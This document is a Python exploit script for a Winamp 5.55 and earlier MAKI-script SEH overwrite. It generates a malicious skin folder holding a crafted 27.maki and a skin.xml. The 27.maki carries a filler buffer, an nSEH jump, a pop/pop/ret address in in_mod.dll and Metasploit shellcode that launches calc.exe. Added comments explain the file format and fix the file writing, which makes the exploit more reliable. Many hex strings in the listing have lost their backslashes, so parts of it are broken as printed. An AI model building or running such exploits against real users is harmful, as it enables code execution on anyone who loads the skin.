
# Title : Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit
# Published : 2009-05-22
# Author : His0k4


#usage: python winamp_maki_script.py
#Note : the author reports this script failed under Windows but worked under Ubuntu. The likely cause is that the output files are opened in text mode ('w'): on Windows that rewrites every \n as \r\n inside the binary .maki and the CRLF skin.xml, so the generated skin is corrupted. Open them with 'wb' instead.
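# Banner.  Built as one string and printed with a single call so the output is
# identical under Python 2 (print statement) and Python 3 (print function).
# The doubled "\n" reproduce the blank lines of the original, whose "\n"
# escapes had lost their backslashes in this listing ("Exploitn").
BANNER = (
    "**************************************************************************\n"
    " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n\n"
    " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n\n"
    " Exploit code: His0k4\n\n"
    " Tested on: Windows XP Pro SP3 (EN)\n\n"
    " Greetings to:\n"
    " All friends & muslims HaCkers(dz),snakespc.com\n\n"
    " Serra7 Merra7,Koulchi Mderra7\n\n"
    "**************************************************************************"
)
print(BANNER)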

import os

# First part of the crafted 27.maki.  NOTE(review): this listing has lost the
# backslashes of its "\xNN" escapes ("x46x47..." should read "\x46\x47...");
# as printed, Python writes the literal letters "x46" instead of the bytes.
# What the bytes themselves show:
#   offset   0: 0x46 0x47 ("FG") then 0x03 0x04 -- the MAKI file magic/version
#   offset   4: 0x17 0x00 0x00 0x00, then 0x27 0x00 0x00 0x00 (= 39); the
#               following 624 bytes are exactly 39 * 16, consistent with a
#               table of 39 16-byte entries (presumably GUIDs -- not verified)
#   offset 636: 0x0e 0x00 0x00 0x00 (= 14), a count that equals the 13 named
#               function-table entries at the start of header2 plus the one
#               entry begun below
#   offset 640: 0x01 0x01 0x00 0x00 0xab 0xb0 -- the start of a function-table
#               entry.  header2's entries have the shape <4 bytes><u16 name
#               length><name> (e.g. "\x01\x01\x00\x00\x0b\x00getSkinName"), so
#               0xb0ab (45227) is an oversized name length, and `payload`,
#               which is appended right after header1, becomes that "name".
header1=(
"x46x47x03x04x17x00x00x00x27x00x00x00x71x49x65x51x87x0dx51x4a"
"x91xe3xa6xb5x32x35xf3xe7x64x0fxf5xd6xfax93xb7x49x93xf1xbax66"
"xefxaex3ex98x7bxc4x0dxe9x0dx84xe7x4axb0x2cx04x0bxd2x75xf7xfc"
"xb5x3ax02xb2x4dx43xa1x4bxbexaex59x63x75x03xf3xc6x78x57xc6x87"
"x43xe7xfex49x85xf9x09xccx53x2axfdx56x65x36x60x38x1bx46xa7x42"
"xaax75xd8x3fx66x67xbfx73xf4x7ax78xf4xbbxb2xf7x4ex9cxfbxe7x4b"
"xa9xbexa8x8dx02x0cx37x3axbfx3cx9fx43x84xf1x86x88x5bxcfx1ex36"
"xb6x5bx0cx5dxe1x7dx1fx4bxa7x0fx8dx16x59x94x19x41x99xe1xe3x4e"
"x36xc6xecx4bx97xcdx78xbcx9cx86x28xb0xe5x95xbex45x72x20x91x41"
"x93x5cxbbx5fxf9xf1x17xfdx4ex6dx90x60x7ex53x2ex48xb0x04xccx94"
"x61x88x56x72xc0xbcx3ax40x22x6fxd6x4bx8bxa4x10xc8x29x93x25x47"
"x4dx3exaax97xd0xf4xa8x4fx81x7bx0axf2x2ax45x49x83xfaxbbxe4x64"
"xf4x81xd9x49xb0xc0xa8x5bx2exc3xbcxfdx3fx5exb6x62x5ex37x8dx40"
"x8dxeax76x81x4axb9x1bx77xbex97x4fxcexb0x77x19x4ex99x56xd4x98"
"x33xc9x6cx27x0dx20xc2xa8xebx51x2ax4bxbax7fx5dx4bxc6x5dx4cx71"
"x38xbax1ex8dx9ex48x3ex48xb9x60x8dx1fx43xc5xc4x05x40xc9x08x0f"
"x39xafx23x4bx80xf3xb8xc4x8fx7exbbx59x72x86xaaxefx0ex31xfax41"
"xb7xdcx85xa9x52x5bxcbx4bx44x32xfdx7dx51x37x7cx4exbfx40x82xae"
"x5fx3axdcx33x15xfaxb9x5ax7dx9ax57x45xabxc8x65x57xa6xc6x7cxa9"
"xcdxddx8ex69x1ex8fxecx4fx9bx12xf9x44xf9x09xffx45x27xcdx64x6b"
"x26x5ax4bx4cx8cx59xe6xa7x0cxf6x49x3axe4x05xcbx6dxc4x8axc2x48"
"xb1x93x49xf0x91x0exf5x4axffxcfxdcxb4xfex81xccx4bx96x1bx72x0f"
"xd5xbex0fxffxe1x8cxe2x01x59xb0xd5x11x97x9fxe4xdex6fx51x76x0a"
"xbdxf8xf0x80xa5x1bxa6x42xa0x93x32x36xa0x0cx8dx4ax1bx34x2ex9b"
"x98x6cxfax40x8bx85x0cx1bx6exe8x94x05x71x9bxd5x36xfdx03xf8x4a"
"x97x95x05x02xb7xdbx26x7ax10xf2xd5x7fxc4xacxdfx48xa6xa0x54x51"
"x57x6cxdcx76x35xa5xbaxb5xb3x05xcbx4dxadxc1xe6x18xd2x8fx68x96"
"xc1xfex29x61xb7xdax51x4dx91x65x01xcax0cx1bx70xdbxf7x14x95xd5"
"x36xedxe8x45x98x0fx3fx4exa0x52x2cxd9x82x4bx3bx9bx7ax66x0ex42"
"x8fxfcx79x41x15x80x9cx02x99x31xedxc7x19x53x98x47x98x63x60xb1"
"x5ax29x8cxaax4dxc1xbbxe2xf6x84x73x41xbdxb3xb2xebx2fx66x55x50"
"x94x05xc0x73x1fx96x1bx40x9bx1bx67x24x27xacx41x65x0ex00x00x00"
"x01x01x00x00xabxb0")
	
		
# Remainder of the 27.maki, written after `payload`.  Same caveat as header1:
# the "\x" escapes have lost their backslashes in this listing.
# Decoding the bytes: it starts with 13 function-table entries of the form
# <4 bytes><u16 name length><name> -- getSkinName, getPrivateInt,
# getTimeOfDay, setPrivateInt, messageBox, integerToString, onScriptLoaded,
# getScriptGroup, getObject, onLeftClick, navigateUrlBrowser,
# getPlayItemMetaDataString, getPlayItemDisplayTitle -- then further tables,
# including string constants ("runtimecheck", "This script requires ",
# "Winamp 5.54 (skin version 1.34)", "Error", "DEBUG", "nowplaying",
# "winshadeiconmodern", "http://client.winamp.com/nowplaying/artist/?icid=",
# "&artistName=", "artist", "uvox/artist", "cbs/artist", "streamtitle"),
# and finally uninterpreted bytes, presumably the script's bytecode.  The
# strings suggest this was lifted from the Bento skin's now-playing script
# (skin_xml's own comment credits 'Big Bento'); not verified beyond that.
header2=(
"x01x01x00x00x0bx00x67x65x74x53x6bx69x6ex4ex61x6dx65x01x01x00"
"x00x0dx00x67x65x74x50x72x69x76x61x74x65x49x6ex74x01x01x00x00"
"x0cx00x67x65x74x54x69x6dx65x4fx66x44x61x79x01x01x00x00x0dx00"
"x73x65x74x50x72x69x76x61x74x65x49x6ex74x01x01x00x00x0ax00x6d"
"x65x73x73x61x67x65x42x6fx78x01x01x00x00x0fx00x69x6ex74x65x67"
"x65x72x54x6fx53x74x72x69x6ex67x01x01x00x00x0ex00x6fx6ex53x63"
"x72x69x70x74x4cx6fx61x64x65x64x01x01x00x00x0ex00x67x65x74x53"
"x63x72x69x70x74x47x72x6fx75x70x0ax01x00x00x09x00x67x65x74x4f"
"x62x6ax65x63x74x17x01x00x00x0bx00x6fx6ex4cx65x66x74x43x6cx69"
"x63x6bx01x01x00x00x12x00x6ex61x76x69x67x61x74x65x55x72x6cx42"
"x72x6fx77x73x65x72x01x01x00x00x19x00x67x65x74x50x6cx61x79x49"
"x74x65x6dx4dx65x74x61x44x61x74x61x53x74x72x69x6ex67x01x01x00"
"x00x17x00x67x65x74x50x6cx61x79x49x74x65x6dx44x69x73x70x6cx61"
"x79x54x69x74x6cx65x1fx00x00x00x01x01x00x00x00x00x00x00x00x00"
"x00x00x01x01x02x00x00x00x00x00x00x00x00x00x00x00x01x00x02x00"
"x00x00x00x00x00x00x00x00x00x00x01x00x04x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x02x00x00x00x02x00x00x00x00x00x00x00x00x00"
"x02x00x00x00xffxffx00x00x00x00x00x00x00x00x02x00x00x00x01x00"
"x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x02x00x00x00x88x13x00x00x00x00x00x00x00x00x06x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x17x01x00x00"
"x00x00x00x00x00x00x00x00x01x00x06x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x0ex00x00x00x07x00x00x00x0cx00x72x75x6ex74x69x6d"
"x65x63x68x65x63x6bx0cx00x00x00x15x00x54x68x69x73x20x73x63x72"
"x69x70x74x20x72x65x71x75x69x72x65x73x20x0dx00x00x00x1fx00x57"
"x69x6ex61x6dx70x20x35x2ex35x34x20x28x73x6bx69x6ex20x76x65x72"
"x73x69x6fx6ex20x31x2ex33x34x29x0ex00x00x00x05x00x45x72x72x6f"
"x72x0fx00x00x00x00x00x11x00x00x00x05x00x44x45x42x55x47x14x00"
"x00x00x0ax00x6ex6fx77x70x6cx61x79x69x6ex67x16x00x00x00x12x00"
"x77x69x6ex73x68x61x64x65x69x63x6fx6ex6dx6fx64x65x72x6ex18x00"
"x00x00x31x00x68x74x74x70x3ax2fx2fx63x6cx69x65x6ex74x2ex77x69"
"x6ex61x6dx70x2ex63x6fx6dx2fx6ex6fx77x70x6cx61x79x69x6ex67x2f"
"x61x72x74x69x73x74x2fx3fx69x63x69x64x3dx19x00x00x00x0cx00x26"
"x61x72x74x69x73x74x4ex61x6dx65x3dx1ax00x00x00x06x00x61x72x74"
"x69x73x74x1cx00x00x00x0bx00x75x76x6fx78x2fx61x72x74x69x73x74"
"x1dx00x00x00x0ax00x63x62x73x2fx61x72x74x69x73x74x1ex00x00x00"
"x0bx00x73x74x72x65x61x6dx74x69x74x6cx65x02x00x00x00x00x00x00"
"x00x07x00x00x00x53x01x00x00x13x00x00x00x0ax00x00x00x86x01x00"
"x00xd1x02x00x00x01x03x00x00x00x01x00x00x00x00x18x00x00x00x00"
"x30x02x01x03x00x00x00x01x04x00x00x00x0cx01x03x00x00x00x01x05"
"x00x00x00x0ax51x10xb9x00x00x00x01x02x00x00x00x01x06x00x00x00"
"x30x02x01x09x00x00x00x01x00x00x00x00x01x08x00x00x00x01x07x00"
"x00x00x01x00x00x00x00x18x01x00x00x00x18x02x00x00x00x30x02x01"
"x0ax00x00x00x01x00x00x00x00x18x03x00x00x00x30x02x01x0ax00x00"
"x00x01x09x00x00x00x41x01x0bx00x00x00x0cx01x09x00x00x00x01x0a"
"x00x00x00x0cx50x10x06x00x00x00x01x08x00x00x00x21x01x00x00x00"
"x00x01x00x00x00x00x18x03x00x00x00x01x07x00x00x00x01x00x00x00"
"x00x18x01x00x00x00x18x04x00x00x00x02x01x00x00x00x00x01x0fx00"
"x00x00x01x06x00x00x00x01x0ex00x00x00x01x0cx00x00x00x01x0dx00"
"x00x00x40x18x05x00x00x00x02x01x08x00x00x00x21x01x06x00x00x00"
"x21x01x01x00x00x00x21x03x10x00x00x00x01x00x00x00x00x01x0fx00"
"x00x00x01x08x00x00x00x01x11x00x00x00x01x10x00x00x00x70x05x00"
"x00x00x04x02x01x01x00x00x00x21x03x12x00x00x00x01x00x00x00x00"
"x01x0fx00x00x00x01x08x00x00x00x01x11x00x00x00x01x00x00x00x00"
"x01x12x00x00x00x70x06x00x00x00x01x70x05x00x00x00x04x02x01x01"
"x00x00x00x21x19xa8xfexffxffx11x06x00x00x00x01x01x00x00x00x21"
"x01x13x00x00x00x01x00x00x00x00x70x08x00x00x00x00x01x14x00x00"
"x00x70x09x00x00x00x01x30x02x01x01x00x00x00x21x01x02x00x00x00"
"x10x06x00x00x00x01x01x00x00x00x21x01x15x00x00x00x19x4dx00x00"
"x00x30x02x01x15x00x00x00x01x0fx00x00x00x08x10x06x00x00x00x01"
"x01x00x00x00x21x01x17x00x00x00x01x16x00x00x00x30x02x01x00x00"
"x00x00x01x18x00x00x00x01x17x00x00x00x40x01x19x00x00x00x40x01"
"x15x00x00x00x40x70x0bx00x00x00x01x02x01x01x00x00x00x21x01x1b"
"x00x00x00x01x00x00x00x00x01x1ax00x00x00x70x0cx00x00x00x01x30"
"x02x01x1bx00x00x00x01x0fx00x00x00x08x10x17x00x00x00x01x1bx00"
"x00x00x01x00x00x00x00x01x1cx00x00x00x70x0cx00x00x00x01x30x02"
"x01x1bx00x00x00x01x0fx00x00x00x08x10x17x00x00x00x01x1bx00x00"
"x00x01x00x00x00x00x01x1dx00x00x00x70x0cx00x00x00x01x30x02x01"
"x1bx00x00x00x01x0fx00x00x00x08x10x17x00x00x00x01x1bx00x00x00"
"x01x00x00x00x00x01x1ex00x00x00x70x0cx00x00x00x01x30x02x01x1b"
"x00x00x00x01x0fx00x00x00x08x10x12x00x00x00x01x1bx00x00x00x01"
"x00x00x00x00x70x0dx00x00x00x00x30x02x01x1bx00x00x00x21x01x01"
"x00x00x00x21x21x01x01x00x00x00x21x21x01x01x00x00x00x21x21x01"
"x01x00x00x00x21x21x01x01x00x00x00x21x21x01x01x00x00x00x21x21"
"x01x01x00x00x00x21")


# skin.xml manifest for the generated skin, hex-encoded (same lost-backslash
# caveat as header1).  Decoded, it is plain text with CRLF line endings:
#   <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
#   <WinampAbstractionLayer version="1.34">  with a <skininfo> block
#   (name Bento, author/comment His0k4, homepage http://www.snakespc.com/),
#   accelerator bindings (Alt+F/P/O/I/H -> MENUHOTKEY_*, space ->
#   SHOW_CURRENT_TRACK), the comment "This Skin uses shared Graphics, XML
#   and Maki from 'Big Bento'", and the part that matters for the exploit:
#   <scripts><script file="/scripts/27.maki" param="small"/></scripts>
#   ("Must be loaded at first"), which makes Winamp parse the crafted
#   27.maki as soon as the skin is loaded.
# Because the text carries CRLF, it must be written in binary mode or
# text-mode newline translation on Windows will alter it.
skin_xml=(
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64"
"x69x6ex67x3dx22x55x54x46x2dx38x22x20x73x74x61x6ex64x61x6cx6fx6ex65x3dx22x79"
"x65x73x22x3fx3ex0dx0ax0dx0ax3cx57x69x6ex61x6dx70x41x62x73x74x72x61x63x74x69"
"x6fx6ex4cx61x79x65x72x20x76x65x72x73x69x6fx6ex3dx22x31x2ex33x34x22x3ex0dx0a"
"x09x3cx73x6bx69x6ex69x6ex66x6fx3ex0dx0ax09x09x3cx76x65x72x73x69x6fx6ex3ex31"
"x2ex32x3cx2fx76x65x72x73x69x6fx6ex3ex0dx0ax09x09x3cx6ex61x6dx65x3ex42x65x6e"
"x74x6fx3cx2fx6ex61x6dx65x3ex0dx0ax09x09x3cx61x75x74x68x6fx72x3ex48x69x73x30"
"x6bx34x3cx2fx61x75x74x68x6fx72x3ex0dx0ax09x09x3cx63x6fx6dx6dx65x6ex74x3ex48"
"x69x73x30x6bx34x3cx2fx63x6fx6dx6dx65x6ex74x3ex0dx0ax09x09x3cx65x6dx61x69x6c"
"x3ex48x69x73x30x6bx34x2ex68x6cx6dx40x67x6dx61x69x6cx2ex63x6fx6dx3cx2fx65x6d"
"x61x69x6cx3ex0dx0ax09x09x3cx73x63x72x65x65x6ex73x68x6fx74x3ex48x69x73x30x6b"
"x34x2ex70x6ex67x3cx2fx73x63x72x65x65x6ex73x68x6fx74x3ex0dx0ax09x09x3cx68x6f"
"x6dx65x70x61x67x65x3ex68x74x74x70x3ax2fx2fx77x77x77x2ex73x6ex61x6bx65x73x70"
"x63x2ex63x6fx6dx2fx3cx2fx68x6fx6dx65x70x61x67x65x3ex0dx0ax09x3cx2fx73x6bx69"
"x6ex69x6ex66x6fx3ex0dx0ax0dx0ax09x3cx61x63x63x65x6cx65x72x61x74x6fx72x73x20"
"x73x65x63x74x69x6fx6ex3dx22x67x65x6ex65x72x61x6cx22x3ex0dx0ax09x09x3cx61x63"
"x63x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6cx74x2bx46x22x20x61x63"
"x74x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx46x49x4cx45x22x20x2fx3e"
"x0dx0ax09x09x3cx61x63x63x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6c"
"x74x2bx50x22x20x61x63x74x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx50"
"x4cx41x59x22x20x2fx3ex0dx0ax09x09x3cx61x63x63x65x6cx65x72x61x74x6fx72x20x62"
"x69x6ex64x3dx22x41x6cx74x2bx4fx22x20x61x63x74x69x6fx6ex3dx22x4dx45x4ex55x48"
"x4fx54x4bx45x59x5fx4fx50x54x49x4fx4ex53x22x20x2fx3ex0dx0ax09x09x3cx61x63x63"
"x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6cx74x2bx49x22x20x61x63x74"
"x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx56x49x45x57x22x20x2fx3ex0d"
"x0ax09x09x3cx61x63x63x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6cx74"
"x2bx48x22x20x61x63x74x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx48x45"
"x4cx50x22x20x2fx3ex0dx0ax09x3cx2fx61x63x63x65x6cx65x72x61x74x6fx72x73x3ex0d"
"x0ax0dx0ax09x3cx61x63x63x65x6cx65x72x61x74x6fx72x73x20x73x65x63x74x69x6fx6e"
"x3dx22x6ex6fx72x6dx61x6cx22x3ex0dx0ax09x09x09x3cx61x63x63x65x6cx65x72x61x74"
"x6fx72x20x62x69x6ex64x3dx22x73x70x61x63x65x22x20x61x63x74x69x6fx6ex3dx22x53"
"x48x4fx57x5fx43x55x52x52x45x4ex54x5fx54x52x41x43x4bx22x20x2fx3ex0dx0ax09x3c"
"x2fx61x63x63x65x6cx65x72x61x74x6fx72x73x3ex0dx0ax0dx0ax09x3cx21x2dx2dx20x54"
"x68x69x73x20x53x6bx69x6ex20x75x73x65x73x20x73x68x61x72x65x64x20x47x72x61x70"
"x68x69x63x73x2cx20x58x4dx4cx20x61x6ex64x20x4dx61x6bx69x20x66x72x6fx6dx20x27"
"x42x69x67x20x42x65x6ex74x6fx27x20x2dx2dx3ex0dx0ax0dx0ax09x3cx73x63x72x69x70"
"x74x73x3ex0dx0ax09x09x3cx73x63x72x69x70x74x20x66x69x6cx65x3dx22x2fx73x63x72"
"x69x70x74x73x2fx32x37x2ex6dx61x6bx69x22x20x70x61x72x61x6dx3dx22x73x6dx61x6c"
"x6cx22x2fx3ex20x3cx21x2dx2dx20x4dx75x73x74x20x62x65x20x6cx6fx61x64x65x64x20"
"x61x74x20x66x69x72x73x74x20x2dx2dx3ex0dx0ax09x3cx2fx73x63x72x69x70x74x73x3e"
"x0dx0ax0dx0ax3cx2fx57x69x6ex61x6dx70x41x62x73x74x72x61x63x74x69x6fx6ex4cx61"
"x79x65x72x3e")

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# Metasploit-generated proof-of-concept payload: it launches calc.exe
# (CMD=calc) and unwinds via the SEH exit method (EXITFUNC=seh).  343 bytes
# (21 lines of 16 plus 7), matching the advertised size.  The first ten bytes
# \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff (jmp +3 / pop ecx / jmp +5 /
# call -8) are the PexAlphaNum decoder's GetPC stub; everything after them is
# the alphanumeric-encoded body.  Same lost-backslash caveat as header1:
# "xeb" in this listing should read "\xeb".
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x30x42x50x4bx38x45x44x4ex53x4bx48x4ex47"
"x45x30x4ax57x41x50x4fx4ex4bx48x4fx54x4ax31x4bx38"
"x4fx55x42x32x41x30x4bx4ex49x54x4bx58x46x33x4bx48"
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x32x46x30x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x36x4bx48x4ex50x4bx44"
"x4bx58x4fx55x4ex51x41x50x4bx4ex4bx58x4ex51x4bx48"
"x41x30x4bx4ex49x48x4ex45x46x32x46x30x43x4cx41x53"
"x42x4cx46x46x4bx58x42x54x42x33x45x58x42x4cx4ax57"
"x4ex30x4bx58x42x34x4ex50x4bx48x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x30x4bx48x42x38x42x4b"
"x42x30x42x30x42x30x4bx58x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x46x48x45x49x58x4ax4fx43x38x42x4cx4bx47"
"x42x35x4ax46x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex56x43x46x42x50x5a")

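# Contents of the oversized function-name field (see header1's tail), laid
# out as a classic SEH overwrite.  The "\x" escapes are restored here -- the
# listing had dropped their backslashes, which would have produced literal
# "x41x41..." text instead of bytes.
#   16756 bytes  filler, up to the SEH registration record
#   4 bytes      nSEH: \x74\x06\x90\x90 = jz short +6, hopping over the
#                handler address into the shellcode.  Note this is a
#                *conditional* jump: it only lands in the shellcode if ZF is
#                set when the pop/pop/ret returns here; \xeb\x06 (jmp short)
#                would be the unconditional form.
#   4 bytes      SEH handler: 0x12F05532 (little-endian), a pop/pop/ret in
#                in_mod.dll.  "Universal" only as far as that in_mod.dll
#                build goes -- the banner says it was tested on XP SP3 (EN)
#                with Winamp <= 5.55.
#   343 bytes    the Metasploit calc.exe shellcode
payload = "\x41" * 16756
payload += "\x74\x06\x90\x90"  # nSEH
payload += "\x32\x55\xF0\x12"  # SEH: universal p/p/r in_mod.dll
payload += shellcode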
	
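def write_skin_files(skin_dir, maki_data, xml_data):
    """Create ``skin_dir``/scripts/27.maki and ``skin_dir``/skin.xml.

    Both files are written in *binary* mode: 27.maki is MAKI bytecode and
    skin.xml is stored with CRLF line endings, so text-mode ("w") newline
    translation on Windows would silently corrupt them (the original
    text-mode version is presumably why the script only worked on Linux).
    ``str`` input is encoded as latin-1 so every "\\xNN" escape is written
    as exactly that byte value; under Python 2 ``str`` already is bytes and
    is written unchanged.

    Raises OSError (IOError on Python 2) if ``skin_dir`` or its ``scripts``
    sub-directory already exists, or if a file cannot be written.
    """
    os.mkdir(skin_dir)
    os.mkdir(os.path.join(skin_dir, "scripts"))
    targets = (
        (os.path.join(skin_dir, "scripts", "27.maki"), maki_data),
        (os.path.join(skin_dir, "skin.xml"), xml_data),
    )
    for path, data in targets:
        if not isinstance(data, bytes):
            data = data.encode("latin-1")
        with open(path, "wb") as out:
            out.write(data)


# Pause prompt: raw_input on Python 2, input on Python 3.
try:
    _prompt = raw_input
except NameError:
    _prompt = input


if __name__ == "__main__":
    try:
        write_skin_files("dz_skin", header1 + payload + header2, skin_xml)
    except (OSError, IOError) as exc:
        # Typically "dz_skin" is left over from a previous run; say which
        # path failed instead of a bare "Error".
        print("Error: %s" % exc)
    else:
        _prompt("\nSkin's files created!\n")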
